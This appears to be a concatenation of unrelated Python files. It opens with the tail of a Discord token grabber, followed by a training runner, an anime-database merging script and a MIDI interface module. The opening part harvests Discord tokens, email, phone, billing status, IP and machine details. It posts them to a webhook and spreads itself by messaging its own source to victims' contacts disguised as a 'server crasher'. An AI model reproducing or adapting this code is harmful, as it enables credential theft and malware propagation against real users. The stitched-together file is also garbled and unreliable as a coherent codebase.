uid = None
if not token.startswith("mfa."):
try:
uid = b64decode(token.split(".")[0].encode()).decode()
except:
pass
if not uid or uid in working_ids:
continue
user_data = getuserdata(token)
if not user_data:
continue
working_ids.append(uid)
working.append(token)
username = user_data["username"] + "#" + str(user_data["discriminator"])
user_id = user_data["id"]
avatar_id = user_data["avatar"]
avatar_url = getavatar(user_id, avatar_id)
email = user_data.get("email")
phone = user_data.get("phone")
nitro = bool(user_data.get("premium_type"))
billing = bool(has_payment_methods(token))
embed = {
"color": 0x7289da,
"fields": [
{
"name": "**Account Info**",
"value": f'Email: {email}\nPhone: {phone}\nNitro: {nitro}\nBilling Info: {billing}',
"inline": True
},
{
"name": "**PC Info**",
"value": f'IP: {ip}\nUsername: {pc_username}\nPC Name: {pc_name}\nToken Location: {platform}',
"inline": True
},
{
"name": "**Token**",
"value": token,
"inline": False
}
],
"author": {
"name": f"{username} ({user_id})",
"icon_url": avatar_url
},
"footer": {
"text": f"Token Grabber By Astraa",
}
}
embeds.append(embed)
with open(cache_path, "a") as file:
for token in checked:
if not token in already_cached_tokens:
file.write(token + "\n")
if len(working) == 0:
working.append('123')
webhook = {
"content": "",
"embeds": embeds,
"username": "Discord Token Grabber",
"avatar_url": "https://discordapp.com/assets/5ccabf62108d5a8074ddd95af2211727.png"
}
try:
urlopen(Request("ENTER_YOUR_WBHOOK_URL", data=dumps(webhook).encode(), headers=getheaders()))
except:
pass
if self_spread:
for token in working:
with open(argv[0], encoding="utf-8") as file:
content = file.read()
payload = f'-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="file"; filename="{__file__}"\nContent-Type: text/plain\n\n{content}\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="content"\n\nserver crasher. python download: https://www.python.org/downloads\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="tts"\n\nfalse\n-----------------------------325414537030329320151394843687--'
Thread(target=spread, args=(token, payload, 7500 / 1000)).start()
try:
main()
except Exception as e:
print(e)
pass
|
runner.py | import time
from train import main
from datetime import datetime, timedelta
from threading import Thread
def run():
    """Wait two minutes, then kick off a training run via train.main()."""
    print("Sleeping for 2 minutes now.")
    time.sleep(2 * 60)
    main()
def run_on_different_thread(fn):
    """Decorator: each call of the wrapped function runs on a new Thread.

    The wrapper starts the thread immediately and returns it so the caller
    may join() or inspect it.
    """
    def wrapper(*call_args, **call_kwargs):
        worker = Thread(target=fn, args=call_args, kwargs=call_kwargs)
        worker.start()
        return worker
    return wrapper
# Kick off a training run on a background thread roughly every 10 seconds.
# BUG FIX: the original executed `run_on_different_thread(fn=main)`, which
# only builds and discards the wrapper -- `main` was never actually called.
# The wrapper returned by the decorator must itself be invoked.
while 1:
    run_on_different_thread(fn=main)()
    dt = datetime.now() + timedelta(seconds=10)
    while datetime.now() < dt:
        time.sleep(1)
|
enzh_jp.py | import time
import pymysql
from fuzzywuzzy import process
from pymysql.cursors import DictCursor
from multiprocessing import Process
n = 1
animate_id = 100000

# Two local MySQL databases: `bidscore` holds the scraped source tables,
# `miraihyoka` receives the merged `animate` rows.
db1 = pymysql.connect("localhost", "root", "", "bidscore")
db2 = pymysql.connect("localhost", "root", "", "miraihyoka")
cursor_en = db1.cursor(DictCursor)
cursor_zh = db1.cursor(DictCursor)
cursor_anikore = db1.cursor(DictCursor)
cursor = db2.cursor()

# Load all three source tables up front.
sql_en = "select * from en_db"
sql_zh = "select * from bidscore"
sql_anikore = "select * from anikore"
cursor_en.execute(sql_en)
cursor_zh.execute(sql_zh)
cursor_anikore.execute(sql_anikore)
items_en = cursor_en.fetchall()
items_zh = cursor_zh.fetchall()
items_anikore = cursor_anikore.fetchall()

# Column-wise views of the Chinese-side table (parallel lists; positions
# line up, so an index found in one list is valid for all of them).
zh_name_jp = [row["jp_name"] for row in items_zh]
zh_name_en = [row["eg_name"] for row in items_zh]
zh_name_zh = [row["ch_name"] for row in items_zh]
zh_score_douban = [row["D_score"] for row in items_zh]
zh_score_imdb = [row["I_score"] for row in items_zh]
zh_score_bangumi = [row["B_score"] for row in items_zh]
zh_id = [row["id"] for row in items_zh]
zh_starttime = [row["start_data"] for row in items_zh]
zh_introduction = [row["introduction"] for row in items_zh]
zh_area = [row["area"] for row in items_zh]
zh_week = [row["week"] for row in items_zh]
zh_cover = [row["cover"] for row in items_zh]
zh_cv = [row["cv"] for row in items_zh]
zh_info = [row["info"] for row in items_zh]
zh_isfinish = [row["is_finish"] for row in items_zh]

# Column-wise views of the English-side table (same parallel-list layout).
en_id = [row["en_id"] for row in items_en]
en_name_en = [row["name_en"] for row in items_en]
en_name_jp = [row["name_jp"] for row in items_en]
en_score_mal = [row["mal_rating"] for row in items_en]
en_score_ann = [row["ann_rating"] for row in items_en]
en_score_anidb = [row["anidb_rating"] for row in items_en]
en_member = [row["member"] for row in items_en]
def match(anikore_name_jp, anikore_score, anikore_src, animate_id):
    """Fuzzy-match one anikore title against the EN and ZH tables and persist it.

    First inserts a new `animate` row carrying the English-side ratings, then
    updates the same row with the Chinese-side metadata. Matching is done with
    fuzzywuzzy against the module-level parallel lists built at import time.

    Args:
        anikore_name_jp: Japanese title scraped from anikore.
        anikore_score: anikore rating for the title.
        anikore_src: anikore source URL for the title.
        animate_id: primary key to use for the new `animate` row.
    """
    def _en_fields(idx):
        # All English-side columns at one parallel-list position.
        return (en_name_en[idx], en_score_mal[idx], en_score_ann[idx],
                en_score_anidb[idx], en_member[idx])

    def _zh_fields(idx):
        # All Chinese-side columns at one parallel-list position.
        return (zh_name_zh[idx], zh_score_douban[idx], zh_score_imdb[idx],
                zh_score_bangumi[idx], zh_id[idx], zh_starttime[idx],
                zh_introduction[idx], zh_area[idx], zh_week[idx],
                zh_cover[idx], zh_cv[idx], zh_info[idx], zh_isfinish[idx])

    # --- English side: strict Japanese-name match, then English-name match,
    # then a no-cutoff Japanese match (always yields the closest candidate).
    # Compute the list index once per branch instead of re-scanning with
    # list.index() for every single field as the original code did.
    result = process.extractOne(anikore_name_jp, en_name_jp, score_cutoff=95)
    if result is not None:
        en_name, mal_score, ann_score, anidb_score, member = _en_fields(
            en_name_jp.index(result[0]))
    else:
        result = process.extractOne(anikore_name_jp, en_name_en, score_cutoff=90)
        if result is not None:
            en_name, mal_score, ann_score, anidb_score, member = _en_fields(
                en_name_en.index(result[0]))
        else:
            result = process.extractOne(anikore_name_jp, en_name_jp)
            if result is not None:
                en_name, mal_score, ann_score, anidb_score, member = _en_fields(
                    en_name_jp.index(result[0]))
            else:
                en_name, mal_score, ann_score, anidb_score, member = (
                    "暂无", 0, 0, 0, 0)

    sql = "insert into animate(animate_id,name_jp,name_en,mal_rating,ann_rating,anidb_rating,anikore_rating,member) value (" \
          "%s,%s,%s,%s,%s,%s,%s,%s) "
    args = (animate_id, anikore_name_jp, en_name, mal_score, ann_score,
            anidb_score, anikore_score, member)
    db2.ping(reconnect=True)  # the connection may have timed out between rows
    cursor.execute(sql, args)
    db2.commit()

    # --- Chinese side: strict Japanese-name match, then English-name match,
    # then a loose Japanese match (cutoff 80) before giving up on defaults.
    result = process.extractOne(anikore_name_jp, zh_name_jp, score_cutoff=95)
    if result is not None:
        (cn_name, douban_score, imdb_score, bangumi_score, bangumi_id,
         startting, introduction, area, week, cover, cv, info,
         isfinish) = _zh_fields(zh_name_jp.index(result[0]))
    else:
        result = process.extractOne(anikore_name_jp, zh_name_en, score_cutoff=90)
        if result is not None:
            (cn_name, douban_score, imdb_score, bangumi_score, bangumi_id,
             startting, introduction, area, week, cover, cv, info,
             isfinish) = _zh_fields(zh_name_en.index(result[0]))
        else:
            result = process.extractOne(anikore_name_jp, zh_name_jp, score_cutoff=80)
            if result is not None:
                (cn_name, douban_score, imdb_score, bangumi_score, bangumi_id,
                 startting, introduction, area, week, cover, cv, info,
                 isfinish) = _zh_fields(zh_name_jp.index(result[0]))
            else:
                cn_name = "暂无"
                douban_score = 0
                imdb_score = 0
                bangumi_score = 0
                bangumi_id = 0
                startting = "暂无"
                introduction = "暂无"
                area = "暂无"
                week = "暂无"
                cover = "https://bangumi.tv/img/no_icon_subject.png"
                cv = "暂无"
                info = "暂无"
                isfinish = 1

    # Two UPDATEs (kept split as in the original) to fill in the ZH metadata.
    sql = "update animate set name_cn=%s,area=%s,introduction=%s,douban_rating=%s,imdb_rating=%s,bangumi_rating=%s where animate_id=%s"
    args = (cn_name, area, introduction, douban_score, imdb_score,
            bangumi_score, animate_id)
    db2.ping(reconnect=True)
    cursor.execute(sql, args)
    db2.commit()
    sql = "update animate set start_time=%s,info=%s,cv=%s,cover=%s,week=%s,is_finish=%s,bangumi_idid=%s,anikore_url=%s where animate_id=%s"
    args = (startting, info, cv, cover, week, isfinish, bangumi_id,
            anikore_src, animate_id)
    db2.ping(reconnect=True)
    cursor.execute(sql, args)
    db2.commit()
    print("-----------------已插入" + str(animate_id - 100000) + "条-----------------")
if __name__ == '__main__':
    # Spawn one worker process per anikore row; animate_id is the running
    # primary key (starts at 100001). The 0.5 s sleep throttles process
    # creation so the MySQL server is not flooded with connections.
    for item_anikore in items_anikore:
        anikore_name_jp = item_anikore["jpname"]
        anikore_score = item_anikore["score"]
        anikore_src = item_anikore["src"]
        animate_id += 1
        p = Process(target=match, args=(anikore_name_jp,anikore_score,anikore_src,animate_id))
        p.start()
        # NOTE(review): processes are never join()ed -- the final print can
        # run while workers are still writing.
        time.sleep(0.5)
        # match(anikore_name_jp, anikore_score, anikore_src, animate_id)
    print("已完成!!!!!!!!!!!!!")
|
midi_hub.py | """A module for interfacing with the MIDI environment."""
import abc
from collections import defaultdict
from collections import deque
import Queue
import re
import threading
import time
# internal imports
import mido
import tensorflow as tf
# TODO(adarob): Use flattened imports.
from magenta.common import concurrency
from magenta.protobuf import music_pb2
# Metronome defaults: tick length in seconds, General MIDI program for the
# tick sound, per-beat pitches (cycled), and tick velocity.
_DEFAULT_METRONOME_TICK_DURATION = 0.05
_DEFAULT_METRONOME_PROGRAM = 117 # Melodic Tom
_DEFAULT_METRONOME_PITCHES = [44, 35, 35, 35]
_DEFAULT_METRONOME_VELOCITY = 64
_METRONOME_CHANNEL = 1
# 0-indexed.
_DRUM_CHANNEL = 8
try:
  # The RtMidi backend is easier to install and has support for virtual ports.
  import rtmidi # pylint: disable=unused-import,g-import-not-at-top
  mido.set_backend('mido.backends.rtmidi')
except ImportError:
  # Tries to use PortMidi backend by default.
  tf.logging.warn('Could not import RtMidi. Virtual ports are disabled.')
class MidiHubException(Exception):
  """Base class for exceptions raised by this module."""
def get_available_input_ports():
  """Returns a list of available input MIDI ports."""
  # Delegates to whichever mido backend was selected at import time.
  port_names = mido.get_input_names()
  return port_names
def get_available_output_ports():
  """Returns a list of available output MIDI ports."""
  # Delegates to whichever mido backend was selected at import time.
  port_names = mido.get_output_names()
  return port_names
class MidiSignal(object):
"""A class for representing a MIDI-based event signal.
Provides a `__str__` method to return a regular expression pattern for
matching against the string representation of a mido.Message with wildcards
for unspecified values.
Supports matching for message types 'note_on', 'note_off', and
'control_change'. If a mido.Message is given as the `msg` argument, matches
against the exact message, ignoring the time attribute. If a `msg` is
not given, keyword arguments must be provided matching some non-empty subset
of those listed as a value for at least one key in `_VALID_ARGS`.
Examples:
# A signal that matches any 'note_on' message.
note_on_signal = MidiSignal(type='note_on')
# A signal that matches any 'note_on' or 'note_off' message with a pitch
# value of 4 and a velocity of 127.
note_signal = MidiSignal(note=4, velocity=127)
# A signal that matches a specific mido.Message exactly (ignoring time).
msg = mido.Message(type='control_signal', control=1, value=127)
control_1_127_signal = MidiSignal(msg=msg)
Args:
msg: A mido.Message that should be matched exactly (excluding the time
attribute) or None if wildcards are to be used.
**kwargs: Valid mido.Message arguments. Those that are not provided will be
treated as wildcards.
Raises:
MidiHubException: If the message type is unsupported or the arguments are
not in the valid set for the given or inferred type.
"""
_NOTE_ARGS = set(['type', 'note', 'program_number', 'velocity'])
_CONTROL_ARGS = set(['type', 'control', 'value'])
_VALID_ARGS = {
'note_on': _NOTE_ARGS,
'note_off': _NOTE_ARGS,
'control_change': _CONTROL_ARGS,
}
def __init__(self, msg=None, **kwargs):
if msg is not None and kwargs:
raise MidiHubException(
'Either a mido.Message should be provided or arguments. Not both.')
type_ = msg.type if msg is not None else kwargs.get('type')
if type_ is not None and type_ not in self._VALID_ARGS:
raise MidiHubException(
"The type of a MidiSignal must be either 'note_on', 'note_off', "
"'control_change' or None for wildcard matching. Got '%s'." % type_)
# The compatible mido.Message types.
inferred_types = [type_] if type_ is not None else []
# If msg is not provided, check that the given arguments are valid for some
# message type.
if msg is None:
if type_ is not None:
for arg_name in kwargs:
if arg_name not in self._VALID_ARGS[type_]:
raise MidiHubException(
"Invalid argument for type '%s': %s" % (type_, arg_name))
else:
if kwargs:
for name, args in self._VALID_ARGS.iteritems():
if set(kwargs) <= args:
inferred_types.append(name)
if not inferred_types:
raise MidiHubException(
'Could not infer a message type for set of given arguments: %s'
% ', '.join(kwargs))
# If there is only a single valid inferred type, use it.
if len(inferred_types) == 1:
type_ = inferred_types[0]
if msg is not None:
self._regex_pattern = '^' + mido.messages.format_as_string(
msg, include_time=False) + r' time=\d+.\d+$'
else:
# Generate regex pattern.
parts = ['.*' if type_ is None else type_]
for name in mido.messages.SPEC_BY_TYPE[inferred_types[0]][
'value_names']:
if name in kwargs:
parts.append('%s=%d' % (name, kwargs[name]))
else:
parts.append(r'%s=\d+' % name)
self._regex_pattern = '^' + ' '.join(parts) + r' time=\d+.\d+$'
def __str__(self):
  """Returns the regex pattern used to match mido.Message strings."""
  pattern = self._regex_pattern
  return pattern
class Metronome(threading.Thread):
  """A thread implementing a MIDI metronome.

  Args:
    outport: The Mido port for sending messages.
    qpm: The integer quarters per minute to signal on.
    start_time: The float wall time in seconds to treat as the first beat
        for alignment. If in the future, the first tick will not start until
        after this time.
    stop_time: The float wall time in seconds after which the metronome
        should stop, or None if it should continue until `stop` is called.
    velocity: The velocity of the metronome's tick `note_on` message.
    program: The MIDI program number to use for metronome ticks.
    pitches: An ordered collection of integers representing MIDI pitches of
        the metronome's tick, which will be cycled through.
    duration: The duration of the metronome's tick.
  """
  daemon = True

  def __init__(self,
               outport,
               qpm,
               start_time,
               stop_time=None,
               velocity=_DEFAULT_METRONOME_VELOCITY,
               program=_DEFAULT_METRONOME_PROGRAM,
               pitches=None,
               duration=_DEFAULT_METRONOME_TICK_DURATION):
    self._outport = outport
    self.update(
        qpm, start_time, stop_time, velocity, program, pitches, duration)
    super(Metronome, self).__init__()

  def update(self,
             qpm,
             start_time,
             stop_time=None,
             velocity=_DEFAULT_METRONOME_VELOCITY,
             program=_DEFAULT_METRONOME_PROGRAM,
             pitches=None,
             duration=_DEFAULT_METRONOME_TICK_DURATION):
    """Updates Metronome options."""
    # Locking is not required since the attributes are independent and
    # assignment is atomic.
    # Select the metronome's instrument on its dedicated channel.
    self._outport.send(
        mido.Message(type='program_change', program=program,
                     channel=_METRONOME_CHANNEL))
    self._period = 60. / qpm
    self._start_time = start_time
    self._stop_time = stop_time
    self._velocity = velocity
    self._pitches = pitches or _DEFAULT_METRONOME_PITCHES
    self._duration = duration

  def run(self):
    """Outputs metronome tone on the qpm interval until stop signal received."""
    sleeper = concurrency.Sleeper()
    while True:
      wall_time = time.time()
      # Index of the next tick, never earlier than the aligned start.
      tick_count = max(
          0, int((wall_time - self._start_time) // self._period) + 1)
      next_tick_time = tick_count * self._period + self._start_time
      if self._stop_time is not None and self._stop_time < next_tick_time:
        break
      sleeper.sleep_until(next_tick_time)
      tick_pitch = self._pitches[tick_count % len(self._pitches)]
      self._outport.send(
          mido.Message(
              type='note_on',
              note=tick_pitch,
              channel=_METRONOME_CHANNEL,
              velocity=self._velocity))
      sleeper.sleep(self._duration)
      self._outport.send(
          mido.Message(
              type='note_off',
              note=tick_pitch,
              channel=_METRONOME_CHANNEL))

  def stop(self, stop_time=0, block=True):
    """Signals for the metronome to stop.

    Args:
      stop_time: The float wall time in seconds after which the metronome
          should stop. By default, stops at next tick.
      block: If true, blocks until thread terminates.
    """
    self._stop_time = stop_time
    if block:
      self.join()
class MidiPlayer(threading.Thread):
  """A thread for playing back a NoteSequence proto via MIDI.

  The NoteSequence times must be based on the wall time. The playhead matches
  the wall clock. The playback sequence may be updated at any time if
  `allow_updates` is set to True.

  Args:
    outport: The Mido port for sending messages.
    sequence: The NoteSequence to play.
    start_time: The float time before which to strip events, or None for
        construction time. Events before this time will be sent immediately
        on start.
    allow_updates: If False, the thread will terminate after playback of
        `sequence` completes and calling `update_sequence` will result in an
        exception. Otherwise, the thread will stay alive until `stop` is
        called, allowing for additional updates via `update_sequence`.
    channel: The MIDI channel to send playback events.
    offset: The float time in seconds to adjust the playback event times by.
  """

  def __init__(self, outport, sequence, start_time=None,
               allow_updates=False, channel=0, offset=0.0):
    # Fixed: the default was previously `start_time=time.time()`, which is
    # evaluated once at module import and so froze the "default" at import
    # time rather than construction time. A None sentinel restores the
    # documented behavior; `update_sequence` resolves None to call time.
    self._outport = outport
    self._channel = channel
    self._offset = offset

    # Set of notes (pitches) that are currently on.
    self._open_notes = set()
    # Lock for serialization.
    self._lock = threading.RLock()
    # A control variable to signal when the sequence has been updated.
    self._update_cv = threading.Condition(self._lock)
    # The queue of mido.Message objects to send, sorted by ascending time.
    self._message_queue = deque()
    # An event that is set when `stop` has been called.
    self._stop_signal = threading.Event()

    # Initialize message queue.
    # We first have to allow "updates" to set the initial sequence.
    self._allow_updates = True
    self.update_sequence(sequence, start_time=start_time)
    # We now make whether we allow updates dependent on the argument.
    self._allow_updates = allow_updates

    super(MidiPlayer, self).__init__()

  @concurrency.serialized
  def update_sequence(self, sequence, start_time=None):
    """Updates sequence being played by the MidiPlayer.

    Adds events to close any notes that are no longer being closed by the
    new sequence using the times when they would have been closed by the
    previous sequence.

    Args:
      sequence: The NoteSequence to play back.
      start_time: The float time before which to strip events. Defaults to
          call time.

    Raises:
      MidiHubException: If called when _allow_updates is False.
    """
    if start_time is None:
      start_time = time.time()

    if not self._allow_updates:
      raise MidiHubException(
          'Attempted to update a MidiPlayer sequence with updates disabled.')

    new_message_list = []
    # The set of pitches that are already playing and will be closed without
    # first being reopened in the new sequence.
    closed_notes = set()
    for note in sequence.notes:
      if note.start_time >= start_time:
        new_message_list.append(
            mido.Message(type='note_on', note=note.pitch,
                         velocity=note.velocity, time=note.start_time))
        new_message_list.append(
            mido.Message(type='note_off', note=note.pitch,
                         time=note.end_time))
      elif note.end_time >= start_time and note.pitch in self._open_notes:
        new_message_list.append(
            mido.Message(type='note_off', note=note.pitch,
                         time=note.end_time))
        closed_notes.add(note.pitch)

    # Close remaining open notes at the next event time to avoid abruptly
    # ending notes.
    notes_to_close = self._open_notes - closed_notes
    if notes_to_close:
      next_event_time = (
          min(msg.time for msg in new_message_list) if new_message_list
          else 0)
      for note in notes_to_close:
        new_message_list.append(
            mido.Message(type='note_off', note=note, time=next_event_time))

    for msg in new_message_list:
      msg.channel = self._channel
      msg.time += self._offset

    self._message_queue = deque(
        sorted(new_message_list, key=lambda msg: (msg.time, msg.note)))
    self._update_cv.notify()

  @concurrency.serialized
  def run(self):
    """Plays messages in the queue until empty and _allow_updates is False."""
    # Assumes model where NoteSequence is time-stamped with wall time.
    # TODO(hanzorama): Argument to allow initial start not at sequence start?

    # Drop any events whose time has already passed.
    while self._message_queue and self._message_queue[0].time < time.time():
      self._message_queue.popleft()

    while True:
      while self._message_queue:
        delta = self._message_queue[0].time - time.time()
        if delta > 0:
          # Wait until the next message is due or the sequence is updated
          # (wait releases the shared lock so `update_sequence` can run).
          self._update_cv.wait(timeout=delta)
        else:
          msg = self._message_queue.popleft()
          if msg.type == 'note_on':
            self._open_notes.add(msg.note)
          elif msg.type == 'note_off':
            self._open_notes.discard(msg.note)
          self._outport.send(msg)

      # Either keep player alive and wait for sequence update, or return.
      if self._allow_updates:
        self._update_cv.wait()
      else:
        break

  def stop(self, block=True):
    """Signals for the playback to stop and ends all open notes.

    Args:
      block: If true, blocks until thread terminates.
    """
    with self._lock:
      if not self._stop_signal.is_set():
        self._stop_signal.set()
        self._allow_updates = False

        # Replace message queue with immediate end of open notes.
        self._message_queue.clear()
        for note in self._open_notes:
          self._message_queue.append(
              mido.Message(type='note_off', note=note, time=time.time()))
        self._update_cv.notify()
    if block:
      self.join()
class MidiCaptor(threading.Thread):
  """Base class for thread that captures MIDI into a NoteSequence proto.

  If neither `stop_time` nor `stop_signal` are provided as arguments, the
  capture will continue until the `stop` method is called.

  Args:
    qpm: The quarters per minute to use for the captured sequence.
    start_time: The float wall time in seconds when the capture begins.
        Events occurring before this time are ignored.
    stop_time: The float wall time in seconds when the capture is to be
        stopped or None.
    stop_signal: A MidiSignal to use as a signal to stop capture.
  """
  # Fixed: this was `_metaclass__` (single leading underscore), a typo that
  # silently disabled the abstract-method enforcement.
  # NOTE(review): `__metaclass__` is only honored by Python 2; on Python 3
  # the metaclass must be declared in the class statement
  # (`class MidiCaptor(threading.Thread, metaclass=abc.ABCMeta)`). The
  # attribute form is kept here to avoid changing instantiation behavior.
  __metaclass__ = abc.ABCMeta

  # A message that is used to wake the consumer thread.
  _WAKE_MESSAGE = None

  def __init__(self, qpm, start_time=0, stop_time=None, stop_signal=None):
    # A lock for synchronization.
    self._lock = threading.RLock()
    self._receive_queue = Queue.Queue()
    self._captured_sequence = music_pb2.NoteSequence()
    self._captured_sequence.tempos.add(qpm=qpm)
    self._start_time = start_time
    self._stop_time = stop_time
    self._stop_regex = re.compile(str(stop_signal))
    # A set of active MidiSignals being used by iterators.
    self._iter_signals = []
    # An event that is set when `stop` has been called.
    self._stop_signal = threading.Event()
    # Active callback threads keyed by unique thread name.
    self._callbacks = {}
    super(MidiCaptor, self).__init__()

  @property
  @concurrency.serialized
  def start_time(self):
    return self._start_time

  @start_time.setter
  @concurrency.serialized
  def start_time(self, value):
    """Updates the start time, removing any notes that started before it."""
    self._start_time = value
    i = 0
    for note in self._captured_sequence.notes:
      if note.start_time >= self._start_time:
        break
      i += 1
    del self._captured_sequence.notes[:i]

  @property
  @concurrency.serialized
  def _stop_time(self):
    return self._stop_time_unsafe

  @_stop_time.setter
  @concurrency.serialized
  def _stop_time(self, value):
    self._stop_time_unsafe = value

  def receive(self, msg):
    """Adds received mido.Message to the queue for capture.

    Args:
      msg: The incoming mido.Message object to add to the queue for capture.
          The time attribute is assumed to be pre-set with the wall time when
          the message was received.

    Raises:
      MidiHubException: When the received message has an empty time
          attribute.
    """
    if not msg.time:
      raise MidiHubException(
          'MidiCaptor received message with empty time attribute: %s' % msg)
    self._receive_queue.put(msg)

  @abc.abstractmethod
  def _capture_message(self, msg):
    """Handles a single incoming MIDI message during capture.

    Must be serialized in children.

    Args:
      msg: The incoming mido.Message object to capture. The time field is
          assumed to be pre-filled with the wall time when the message was
          received.
    """
    pass

  def _add_note(self, msg):
    """Adds and returns a new open note based on the MIDI message."""
    new_note = self._captured_sequence.notes.add()
    new_note.start_time = msg.time
    new_note.pitch = msg.note
    new_note.velocity = msg.velocity
    new_note.is_drum = (msg.channel == _DRUM_CHANNEL)
    return new_note

  def run(self):
    """Captures incoming messages until stop time or signal received."""
    while True:
      timeout = None
      stop_time = self._stop_time
      if stop_time is not None:
        timeout = stop_time - time.time()
        if timeout <= 0:
          break
      try:
        msg = self._receive_queue.get(block=True, timeout=timeout)
      except Queue.Empty:
        continue

      if msg is MidiCaptor._WAKE_MESSAGE:
        continue

      if msg.time <= self._start_time:
        continue

      if self._stop_regex.match(str(msg)) is not None:
        break

      with self._lock:
        msg_str = str(msg)
        # Distribute a copy to every active `iterate` signal queue.
        for regex, queue in self._iter_signals:
          if regex.match(msg_str) is not None:
            queue.put(msg.copy())

      self._capture_message(msg)

    stop_time = self._stop_time
    # If stopped by signal rather than a stop time, end at the final message.
    end_time = stop_time if stop_time is not None else msg.time

    # Acquire lock to avoid race condition with `iterate`.
    with self._lock:
      # Set final captured sequence.
      self._captured_sequence = self.captured_sequence(end_time)
      # Wake up all generators.
      for regex, queue in self._iter_signals:
        queue.put(MidiCaptor._WAKE_MESSAGE)

  def stop(self, stop_time=None, block=True):
    """Ends capture and truncates the captured sequence at `stop_time`.

    Args:
      stop_time: The float time in seconds to stop the capture, or None if it
          should be stopped now. May be in the past, in which case the
          captured sequence will be truncated appropriately.
      block: If True, blocks until the thread terminates.

    Raises:
      MidiHubException: When called multiple times with a `stop_time`.
    """
    with self._lock:
      if self._stop_signal.is_set():
        if stop_time is not None:
          raise MidiHubException(
              '`stop` must not be called multiple times with a `stop_time` '
              'on MidiCaptor.')
      else:
        self._stop_signal.set()
        self._stop_time = time.time() if stop_time is None else stop_time
    # Force the thread to wake since we've updated the stop time.
    self._receive_queue.put(MidiCaptor._WAKE_MESSAGE)
    if block:
      self.join()

  def captured_sequence(self, end_time=None):
    """Returns a copy of the current captured sequence.

    If called before the thread terminates, `end_time` is required and any
    open notes will have their end time set to it, any notes starting after
    it will be removed, and any notes ending after it will be truncated.
    `total_time` will also be set to `end_time`.

    Args:
      end_time: The float time in seconds to close any open notes and after
          which to close or truncate notes, if the thread is still alive.
          Otherwise, must be None.

    Returns:
      A copy of the current captured NoteSequence proto with open notes
      closed at and later notes removed or truncated to `end_time`.

    Raises:
      MidiHubException: When the thread is alive and `end_time` is None or
          the thread is terminated and `end_time` is not None.
    """
    # Make a copy of the sequence currently being captured.
    current_captured_sequence = music_pb2.NoteSequence()
    with self._lock:
      current_captured_sequence.CopyFrom(self._captured_sequence)

    if self.is_alive():
      if end_time is None:
        raise MidiHubException(
            '`end_time` must be provided when capture thread is still '
            'running.')
      for i, note in enumerate(current_captured_sequence.notes):
        if note.start_time >= end_time:
          # Notes are ordered by start time, so everything from here on is
          # past `end_time` and can be dropped in one deletion.
          del current_captured_sequence.notes[i:]
          break
        if not note.end_time or note.end_time > end_time:
          note.end_time = end_time
      current_captured_sequence.total_time = end_time
    elif end_time is not None:
      raise MidiHubException(
          '`end_time` must not be provided when capture is complete.')

    return current_captured_sequence

  def iterate(self, signal=None, period=None):
    """Yields the captured sequence at every signal message or time period.

    Exactly one of `signal` or `period` must be specified. Continues until
    the captor terminates, at which point the final captured sequence is
    yielded before returning.

    If consecutive calls to iterate are longer than the period, immediately
    yields and logs a warning.

    Args:
      signal: A MidiSignal to use as a signal to yield, or None.
      period: A float period in seconds, or None.

    Yields:
      The captured NoteSequence at event time.

    Raises:
      MidiHubException: If neither `signal` nor `period` or both are
          specified.
    """
    if (signal, period).count(None) != 1:
      raise MidiHubException(
          'Exactly one of `signal` or `period` must be provided to `iterate` '
          'call.')

    if signal is None:
      sleeper = concurrency.Sleeper()
      next_yield_time = time.time() + period
    else:
      regex = re.compile(str(signal))
      queue = Queue.Queue()
      with self._lock:
        self._iter_signals.append((regex, queue))

    while self.is_alive():
      if signal is None:
        skipped_periods = (time.time() - next_yield_time) // period
        if skipped_periods > 0:
          tf.logging.warn(
              'Skipping %d %.3fs period(s) to catch up on iteration.',
              skipped_periods, period)
          next_yield_time += skipped_periods * period
        else:
          sleeper.sleep_until(next_yield_time)
        end_time = next_yield_time
        next_yield_time += period
      else:
        signal_msg = queue.get()
        if signal_msg is MidiCaptor._WAKE_MESSAGE:
          # This is only received when the thread is in the process of
          # terminating. Wait until it is done before yielding the final
          # sequence.
          self.join()
          break
        end_time = signal_msg.time
      # Acquire lock so that `captured_sequence` will be called before thread
      # terminates, if it has not already done so.
      with self._lock:
        if not self.is_alive():
          break
        captured_sequence = self.captured_sequence(end_time)
      yield captured_sequence
    yield self.captured_sequence()

  def register_callback(self, fn, signal=None, period=None):
    """Calls `fn` at every signal message or time period.

    The callback function must take exactly one argument, which will be the
    current captured NoteSequence.

    Exactly one of `signal` or `period` must be specified. Continues until
    the captor thread terminates, at which point the callback is called with
    the final sequence, or `cancel_callback` is called.

    If callback execution is longer than a period, immediately calls upon
    completion and logs a warning.

    Args:
      fn: The callback function to call, passing in the captured sequence.
      signal: A MidiSignal to use as a signal to call `fn` on the current
          captured sequence, or None.
      period: A float period in seconds to specify how often to call `fn`,
          or None.

    Returns:
      The unique name of the callback thread to enable cancellation.

    Raises:
      MidiHubException: If neither `signal` nor `period` or both are
          specified.
    """

    class IteratorCallback(threading.Thread):
      """A thread for executing a callback on each iteration."""

      def __init__(self, iterator, fn):
        self._iterator = iterator
        self._fn = fn
        self._stop_signal = threading.Event()
        super(IteratorCallback, self).__init__()

      def run(self):
        """Calls the callback function for each iterator value."""
        for captured_sequence in self._iterator:
          if self._stop_signal.is_set():
            break
          self._fn(captured_sequence)

      def stop(self):
        """Stops the thread on next iteration, without blocking."""
        self._stop_signal.set()

    t = IteratorCallback(self.iterate(signal, period), fn)
    t.start()

    with self._lock:
      assert t.name not in self._callbacks
      self._callbacks[t.name] = t

    return t.name

  @concurrency.serialized
  def cancel_callback(self, name):
    """Cancels the callback with the given name.

    While the thread may continue to run until the next iteration, the
    callback function will not be executed.

    Args:
      name: The unique name of the callback thread to cancel.
    """
    self._callbacks[name].stop()
    del self._callbacks[name]
class MonophonicMidiCaptor(MidiCaptor):
  """A MidiCaptor for monophonic melodies."""

  def __init__(self, *args, **kwargs):
    # The single currently-open NoteSequence.Note, or None.
    self._open_note = None
    super(MonophonicMidiCaptor, self).__init__(*args, **kwargs)

  @concurrency.serialized
  def _capture_message(self, msg):
    """Handles a single incoming MIDI message during capture.

    If the message is a note_on event, ends the previous note (if
    applicable) and opens a new note in the capture sequence. Ignores
    repeated note_on events.

    If the message is a note_off event matching the current open note in the
    capture sequence, closes that note.

    Args:
      msg: The mido.Message MIDI message to handle.
    """
    is_note_off = (
        msg.type == 'note_off' or
        (msg.type == 'note_on' and msg.velocity == 0))
    if is_note_off:
      open_note = self._open_note
